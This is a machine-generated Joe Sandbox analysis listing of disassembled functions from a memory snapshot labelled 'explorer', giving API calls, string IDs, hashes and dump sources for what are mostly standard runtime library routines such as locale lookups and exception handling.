                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileProcessTime$AllocContextCreateMemoryModuleNameReadSystemThreadUnothrow_t@std@@@Virtual__ehfuncinfo$??2@
                                                                                                        • String ID: $VUUU$invalid stoi argument
                                                                                                        • API String ID: 3815659930-3954507777
                                                                                                        • Opcode ID: 341e5cd34d87c57c9b6c587157ae45dcfcbc87f47500c822639509e4791951c1
                                                                                                        • Instruction ID: 5bf70a6d0ecc64df719f0344e28878f845930a46bd9c7f20ba25104f01827608
                                                                                                        • Opcode Fuzzy Hash: 341e5cd34d87c57c9b6c587157ae45dcfcbc87f47500c822639509e4791951c1
                                                                                                        • Instruction Fuzzy Hash: DF51B7B1644305EFD750AF64DC4AF5B7BE8FF84704F004619FA45E62D0DB78A9048B9A
                                                                                                        Function 007A1BC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,00794C29,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 007A1C89
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00794C29,?,?,?,00000055,?,-00000050,?,?), ref: 007A1CB4
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 007A1D48
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 007A1D56
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007A1E17
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                        • String ID: <Y{$utf8
                                                                                                        • API String ID: 4147378913-1075160420
                                                                                                        • Opcode ID: 69d9a59fdeb5ca5109b6fc94fe13b1cb923ea79b6f6561c370aba8f2e7a53267
                                                                                                        • Instruction ID: 2b6dcac3dae080734fbda4a4801e9c4345f7cbdf32cf3de3ac47ade782fbfada
                                                                                                        • Opcode Fuzzy Hash: 69d9a59fdeb5ca5109b6fc94fe13b1cb923ea79b6f6561c370aba8f2e7a53267
                                                                                                        • Instruction Fuzzy Hash: FF712831A40606EAFB24EB34CC4ABBB73A8EFCA750F544269F505DB181FA7CD8008761
                                                                                                        Function 007A2529 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007A2635
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 007A267E
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 007A268D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007A26D5
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007A26F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                        • String ID: <Y{
                                                                                                        • API String ID: 949163717-2124319567
                                                                                                        • Opcode ID: 35dcafa2a2a23731f409a753cba281c6a864d7dbba03680d1a100970c3fa3dac
                                                                                                        • Instruction ID: 0ce9c11f5e03bd03da4582535ba273d850e3cce06a0385ced6170c368076d989
                                                                                                        • Opcode Fuzzy Hash: 35dcafa2a2a23731f409a753cba281c6a864d7dbba03680d1a100970c3fa3dac
                                                                                                        • Instruction Fuzzy Hash: 5B519171A01209AFDF10DFA9DC45FBE77B8BF8A700F044269E904EB192E7789905CB61
                                                                                                        Function 007A3DE9 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: cd89b731d7df3fbe0e7008cc78d0241aaf09c91161342a67188e9f50347ac92b
                                                                                                        • Instruction ID: 15b00e7752d6d0c9103e0001a91eb0d70dc2b3cfde7065cbf9673a018459b28d
                                                                                                        • Opcode Fuzzy Hash: cd89b731d7df3fbe0e7008cc78d0241aaf09c91161342a67188e9f50347ac92b
                                                                                                        • Instruction Fuzzy Hash: 51D23B71E086298FDB65CE28DC407EAB7B5EBC6305F1446EAD40DE7240E779AE818F41
                                                                                                        Function 007A2354 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,007A2672,00000002,00000000,?,?,?,007A2672,?,00000000), ref: 007A23ED
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,007A2672,00000002,00000000,?,?,?,007A2672,?,00000000), ref: 007A2416
                                                                                                        • GetACP.KERNEL32(?,?,007A2672,?,00000000), ref: 007A242B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: c77d499cc4ac847cd704864dfbb4eef2e294a9e9232a7edb406d94df2ab2ff14
                                                                                                        • Instruction ID: aa19ac0f52299b0ec3ae207b3a63d12ac48446f5bedebc3c70d3d174cfb91e40
                                                                                                        • Opcode Fuzzy Hash: c77d499cc4ac847cd704864dfbb4eef2e294a9e9232a7edb406d94df2ab2ff14
                                                                                                        • Instruction Fuzzy Hash: 8E21B322604105AADF348F1DC904B9B73A6EFDBB50B568664E90ADB216E73EDD83C350
                                                                                                        Function 0078A195 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0078A1A1
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0078A26D
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0078A28D
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0078A297
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 254469556-0
                                                                                                        • Opcode ID: 35e4ce973056058ae03ba33ede719555c7d6200801ac2e4e4ebbb3239b6421ca
                                                                                                        • Instruction ID: e245ca791f76a3c52c1cb3d14f0ad096e719265927d04c13053227c38857faf4
                                                                                                        • Opcode Fuzzy Hash: 35e4ce973056058ae03ba33ede719555c7d6200801ac2e4e4ebbb3239b6421ca
                                                                                                        • Instruction Fuzzy Hash: 66311875D4121CDBDF20EFA4D989BCDBBB8BF08304F1041AAE40DAB250EB755A898F45
                                                                                                        Function 007A1FDB Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A202F
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A2079
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A213F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale$ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3140898709-0
                                                                                                        • Opcode ID: 1d0fa1fc7993aa347d6f67136e86e0ab1bfaace157d1b7ab8e9ec4278fecb471
                                                                                                        • Instruction ID: 26256d0b4e1a4b4a0f4d47e3a347a075d9f043c61cb134e340c577165b14d797
                                                                                                        • Opcode Fuzzy Hash: 1d0fa1fc7993aa347d6f67136e86e0ab1bfaace157d1b7ab8e9ec4278fecb471
                                                                                                        • Instruction Fuzzy Hash: F561807165011B9FDB289F2CCC86BBA77A9FF96300F104269E915C6186EB3CDD82DB50
                                                                                                        Function 0078E87C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0078E974
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0078E97E
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0078E98B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: aa2bc52d15446a3e2250977936e96a6df4e189dea29a070b3933db21bc167327
                                                                                                        • Instruction ID: 0486378225bc8d0436a7aff227d79021234fb0198a93659dac55c4b586966129
                                                                                                        • Opcode Fuzzy Hash: aa2bc52d15446a3e2250977936e96a6df4e189dea29a070b3933db21bc167327
                                                                                                        • Instruction Fuzzy Hash: 7231D67494121CDBCB21EF65DC89BCDBBB8BF08310F5041DAE40CA6260E7749B858F45
                                                                                                        Function 00792930 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1124f90cfe80d4467dedb1b18eba1de972a06b90169947a1a845ad02c99f095e
                                                                                                        • Instruction ID: 57cdec4a0a194fbc46f616ebb65f314ade63188b002f4004415e795fe8f878d0
                                                                                                        • Opcode Fuzzy Hash: 1124f90cfe80d4467dedb1b18eba1de972a06b90169947a1a845ad02c99f095e
                                                                                                        • Instruction Fuzzy Hash: 54F15F71E01219AFDF14DFA8D8806ADB7F1FF89314F258269D819AB345D735AE02CB90
                                                                                                        Function 00764EF0 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <_|$<_|
                                                                                                        • API String ID: 0-1441071013
                                                                                                        • Opcode ID: fffdce61ed1db502c30273abf878f1a56e6e2f4649317d4c546406ce1fb92632
                                                                                                        • Instruction ID: 74ceae4105090f1a397ca9074ce6a8c905a6040ad4fd082be59b0d6be1668429
                                                                                                        • Opcode Fuzzy Hash: fffdce61ed1db502c30273abf878f1a56e6e2f4649317d4c546406ce1fb92632
                                                                                                        • Instruction Fuzzy Hash: F5914575A04689CFDB15CF68C490BEEBBF2EF5A300F18465DD89297782D3399506CBA0
                                                                                                        Function 007651A0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <_|$<_|
                                                                                                        • API String ID: 0-1441071013
                                                                                                        • Opcode ID: f06a26e1c6865fe80cd1419a2af81410f39a897a43af3ef3df924d4894b576dc
                                                                                                        • Instruction ID: a5867fe9ca816e452e16399fe30a6607af1b8045f98bc725fc687cdd8a3f263a
                                                                                                        • Opcode Fuzzy Hash: f06a26e1c6865fe80cd1419a2af81410f39a897a43af3ef3df924d4894b576dc
                                                                                                        • Instruction Fuzzy Hash: A5812370A00A458FEB05CF69C890BEEBBB1BF29304F5442ADDC11A7343D7799845DBA0
                                                                                                        Function 0079C467 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0079C462,?,?,00000008,?,?,007A5F42,00000000), ref: 0079C694
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 2a4573ca30868b80e0b67632bceda82dc6355dc5dafc50e62f267c23acc708f7
                                                                                                        • Instruction ID: d06fb42fa3e66a2bd357066c4f40fd79658785d1c05a9ce7ed6ca403577cc90f
                                                                                                        • Opcode Fuzzy Hash: 2a4573ca30868b80e0b67632bceda82dc6355dc5dafc50e62f267c23acc708f7
                                                                                                        • Instruction Fuzzy Hash: 06B12B32610609DFDF1ACF28D48AB657BA0FF45364F258659E899CF2A1C339E991CF40
                                                                                                        Function 0078A37F Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0078A395
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 2325560087-0
                                                                                                        • Opcode ID: 0b1dfa54107567bc0656f423a258b94ed7fb3c5cb1d79f6c3bd4e54d5fac0c23
                                                                                                        • Instruction ID: c8edf397bc9b0e08374eae239f8334457a42cbedd529d54b095a4f1efbbc8075
                                                                                                        • Opcode Fuzzy Hash: 0b1dfa54107567bc0656f423a258b94ed7fb3c5cb1d79f6c3bd4e54d5fac0c23
                                                                                                        • Instruction Fuzzy Hash: 1F51A0B1D01609DFEB14CF59D889BAEB7F0FB48710F24842ED805EB250D379A940CB96
                                                                                                        Function 0079ED13 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2e6f4b4f2f88fe86271aad99a4b1898c6dda765a65f5b50906cc09c7bf88104
                                                                                                        • Instruction ID: 0963b52f38beacc8cb5edbd9fadd7144e48a51c97c176560de0997a24211f2b8
                                                                                                        • Opcode Fuzzy Hash: b2e6f4b4f2f88fe86271aad99a4b1898c6dda765a65f5b50906cc09c7bf88104
                                                                                                        • Instruction Fuzzy Hash: 0E41A1B190461DAFDF24DF69DC89AEABBB9EF45300F1442D9E41DD3211EA399E848F10
                                                                                                        Function 007A222E Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A2282
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2003897158-0
                                                                                                        • Opcode ID: 2acad3f92ee63670bd0debdc434c907c069c268808255132ddbb7a517bdce5cb
                                                                                                        • Instruction ID: d27d4ab52f3a120502c30eca610133bbf2f14bafbc92012e11627c58bdccaf02
                                                                                                        • Opcode Fuzzy Hash: 2acad3f92ee63670bd0debdc434c907c069c268808255132ddbb7a517bdce5cb
                                                                                                        • Instruction Fuzzy Hash: 4621B632555206EBDB189A29DC45B7A37A8FF86310B11427AFD02D6182EA3CED419754
                                                                                                        Function 007A1EB5 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
